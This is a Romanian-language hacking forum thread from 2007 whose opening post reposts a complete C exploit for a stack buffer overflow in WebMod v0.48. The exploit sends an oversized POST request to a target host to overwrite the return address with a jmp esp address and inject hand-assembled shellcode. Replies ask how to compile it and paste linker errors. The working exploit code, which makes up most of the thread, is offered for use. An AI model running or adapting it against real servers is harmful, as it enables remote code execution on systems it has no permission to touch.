Guest Nemessis Posted May 13, 2007 Report Share Posted May 13, 2007 Nu stiu exact daca a mai fost postat dar la search nu l-am gasit. Exploitul pentru Webmod:/* * WebMod Stack Buffer Overflow * * by cybermind (Kevin Masterson) * [email]cybermind@gmail.com[/email] * * WebMod v0.48 exploit PoC code * */#include <stdio.h>#include <stdlib.h>#include <string.h>#define WIN32_LEAN_AND_MEAN#include <windows.h>#include <winsock.h>#pragma comment (lib, "ws2_32.lib")/*local variables in connectHandle():char *input; 4char buf[8192+1]; 8193int i,j; 8int connfd; 4int myid; 4threaddata_t *tdata; 4httpquery_t query; 149036char tmp[1025]; 1025int rcv; 4char clbuf[11]; 11total: 158293actual (due to padding): 158308 breakdown of types: typedef struct s_var { 546 char name[33]; 33 char value[513]; 513 } var_s; typedef struct s_httpquery { 149036 char method[11]; 11 char clientip[16]; 16 char url[257]; 257 char *get; 4 char *post; 4 char *cookies; 4 var_s vars[256]; 139776 char currentmapname[257]; 257 char sendcookies[8192+1]; 8193 char contenttype[257]; 257 char location[257]; 257 } httpquery_t;*///contains data to fill the Content-Length field withchar spambuf[20000];//code to inject//this particular code only works on Win2K SP4 (v5.0.4.0)//and kernel32.dll v5.0.2195.6688unsigned char code[] = { // ; push string onto the stack without using 0x00 0xB8, 0x59, 0x5A, 0x32, 0x11, //mov eax, 11325A59h ; "HI!\0" + 11111111h 0x2D, 0x11, 0x11, 0x11, 0x11, //sub eax, 11111111h 0x50, //push eax 0x8B, 0xC4, //mov eax, esp ; eax points to string 0x33, 0xC9, //xor ecx, ecx ; zero // ; call MessageBox 0x51, //push ecx ; flags (0) 0x50, //push eax ; caption 0x50, //push eax ; text 0x51, //push ecx ; hwnd (0) 0xB8, 0x98, 0x80, 0xE3, 0x77, //mov eax, 77E38098h ; &MessageBox 0xFF, 0xD0, //call eax // ; call GetCurrentProcessId 0xB8, 0xF4, 0xB8, 0x4E, 0x7C, //mov eax, 7C4EB8F4h ; &GetCurrentProcessId 0xFF, 0xD0, //call eax 0x33, 0xC9, //xor ecx, ecx ; zero // ; call TerminateProcess 0x51, //push ecx ; return code (0) 0x50, //push eax ; process id 0xB8, 0xC3, 0x8D, 0x51, 0x7C, //mov eax, 7C518DC3h ; &TerminateProcess 0xFF, 0xD0 //call eax};//EIP you want to insert, this points to an "FF E4" (jmp esp) in w_mm.dll//set this to 0xFFFFFFFF to just cause a crashunsigned int our_eip = 0x67E03C5B;int main(int argc, char* argv[]) { WSADATA wsadata; int sock = 0; struct hostent* host = NULL; struct sockaddr_in saddr; //data to sent initially char initbuf[] = "POST / HTTP/1.1\nHost: localhost:27015\nContent-Length: "; //data to send after headers char endbuf[] = "\n\n"; char* hostname = NULL; short hostport = 27015; int i; unsigned int sent = 0; //get host/port from command line if (argc < 2) { printf("Usage:\t%s <hostname|ip> [port=27015]\n", argv[0]); return 1; } hostname = argv[1]; if (argc >= 3) hostport = atoi(argv[2]); WSAStartup(MAKEWORD(1,1), &wsadata); sock = socket(AF_INET, SOCK_STREAM, 0); if (sock <= 0) { printf("socket() error\n"); return 1; } host = gethostbyname(hostname); if (!host) { printf("gethostbyname() error\n"); return 1; } printf("Resolved \"%s\" to %s\n", hostname, inet_ntoa(*(struct in_addr*)host->h_addr_list[0])); memset(&saddr, 0, sizeof(struct sockaddr_in)); saddr.sin_family = AF_INET; saddr.sin_port = htons(hostport); memcpy(&saddr.sin_addr.s_addr, host->h_addr_list[0], host->h_length); if (connect(sock, (struct sockaddr*)&saddr, sizeof(struct sockaddr)) < 0) { printf("connect() error\n"); return 1; } //initialize buffers memset(spambuf, 'a', sizeof(spambuf)); //send initial POST request sent += send(sock, initbuf, sizeof(initbuf)-1, 0); //send 7 full spambufs to get 140000 bytes for (i = 0; i < 7; ++i) sent += send(sock, spambuf, sizeof(spambuf), 0); //send partial spambuf to fill remaining data //(18308, this goes right up to the EIP) sent += send(sock, spambuf, 18308, 0); //fill EIP sent += send(sock, (char*)&our_eip, sizeof(our_eip), 0); //insert code! sent += send(sock, (char*)code, sizeof(code), 0); //send newlines after content-length sent += send(sock, endbuf, sizeof(endbuf)-1, 0); printf("%u bytes sent...waiting...\n", sent); //wait for a while so the socket isn't closed on our end //before they receive all the data Sleep(15000); return 0;}// milw0rm.com [2007-03-01] Quote Link to comment Share on other sites More sharing options...
plod Posted May 13, 2007 Report Share Posted May 13, 2007 Si cum il compliez? :roll: Quote Link to comment Share on other sites More sharing options...
kw3rln Posted May 13, 2007 Report Share Posted May 13, 2007 Si cum il compliez? :roll:ban Quote Link to comment Share on other sites More sharing options...
MostWanteD Posted May 13, 2007 Report Share Posted May 13, 2007 nu esti normal fluffy )))))) :twisted: :twisted: :twisted: :twisted: Quote Link to comment Share on other sites More sharing options...
Guest Nemessis Posted May 13, 2007 Report Share Posted May 13, 2007 Ai loviu flafi Quote Link to comment Share on other sites More sharing options...
crystygye Posted May 13, 2007 Report Share Posted May 13, 2007 In file included from cs.c:7:/usr/include/w32api/winsock.h:82:2: warning: #warning "fd_set and associated macros have been defined in sys/types. This can cause runtime problems with W32 sockets"/cygdrive/c/DOCUME~1/CRYSTY~1/LOCALS~1/Temp/ccdnutUK.o:cs.c:(.text+0xef): undefined reference to `_WSAStartup@8'/cygdrive/c/DOCUME~1/CRYSTY~1/LOCALS~1/Temp/ccdnutUK.o:cs.c:(.text+0x10e): undefined reference to `_socket@12'/cygdrive/c/DOCUME~1/CRYSTY~1/LOCALS~1/Temp/ccdnutUK.o:cs.c:(.text+0x149): undefined reference to `_gethostbyname@4'/cygdrive/c/DOCUME~1/CRYSTY~1/LOCALS~1/Temp/ccdnutUK.o:cs.c:(.text+0x18b): undefined reference to `_inet_ntoa@4'/cygdrive/c/DOCUME~1/CRYSTY~1/LOCALS~1/Temp/ccdnutUK.o:cs.c:(.text+0x1de): undefined reference to `_htons@4'/cygdrive/c/DOCUME~1/CRYSTY~1/LOCALS~1/Temp/ccdnutUK.o:cs.c:(.text+0x236): undefined reference to `_connect@12'/cygdrive/c/DOCUME~1/CRYSTY~1/LOCALS~1/Temp/ccdnutUK.o:cs.c:(.text+0x29c): undefined reference to `_send@16'/cygdrive/c/DOCUME~1/CRYSTY~1/LOCALS~1/Temp/ccdnutUK.o:cs.c:(.text+0x2e4): undefined reference to `_send@16'/cygdrive/c/DOCUME~1/CRYSTY~1/LOCALS~1/Temp/ccdnutUK.o:cs.c:(.text+0x321): undefined reference to `_send@16'/cygdrive/c/DOCUME~1/CRYSTY~1/LOCALS~1/Temp/ccdnutUK.o:cs.c:(.text+0x354): undefined reference to `_send@16'/cygdrive/c/DOCUME~1/CRYSTY~1/LOCALS~1/Temp/ccdnutUK.o:cs.c:(.text+0x387): undefined reference to `_send@16'/cygdrive/c/DOCUME~1/CRYSTY~1/LOCALS~1/Temp/ccdnutUK.o:cs.c:(.text+0x3bc): moreundefined references to `_send@16' followcollect2: ld returned 1 exit status Quote Link to comment Share on other sites More sharing options...
kw3rln Posted May 13, 2007 Report Share Posted May 13, 2007 nu esti normal fluffy )))))) :twisted: :twisted: :twisted: :twisted: numa asa scapam de astia ! Quote Link to comment Share on other sites More sharing options...